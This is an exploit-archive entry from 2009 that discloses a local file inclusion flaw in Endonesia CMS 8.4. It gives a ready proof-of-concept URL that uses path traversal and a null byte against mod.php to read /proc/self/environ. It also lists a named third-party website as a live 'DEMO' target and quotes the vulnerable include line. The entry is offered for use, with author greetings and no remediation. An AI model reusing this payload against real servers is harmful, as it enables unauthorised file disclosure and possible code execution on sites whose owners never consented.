[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Endonesia CMS 8.4 local file inclusion
# Published : 2009-11-04
# Author : s4r4d0
# Previous Title : Portili Personal and Team Wiki <=1.14 Multiple Vulnerabilities
# Next Title : PunBB Extension Attachment <= 1.0.2 SQL Injection
[*] Endonesia 8.4 CMS
[*] Site: http://www.endonesia.org/
[*] Download: http://sourceforge.net/projects/endonesia
[*] Bug: Local File Inclusion in mod.php file !
[*] Author: s4r4d0
[*] Mail: s4r4d0@yahoo.com
[*] Team: Fatal Error
[*] Poc:http://www.site.com/mod.php?mod=/../../../../../../proc/self/environ%00
[*] DEMO:http://www.trubus-online.com/mod.php?mod=/../../../../../../proc/self/environ%00
[*] SecurityReason Note :
#
# Vulnerable Code in mod.php :
#
# include("./mod/$mod/index.php");
#
# magic_quotes = Off
#
# - sp3x
#
[*] Greetz: Elemento_pcx - z4i0n - D3UX - m4v3rick - HADES - Hualdo - Vympel - sp3x !
[*] Made in Brazil
[*] Reference: http://securityreason.com/exploitalert/7435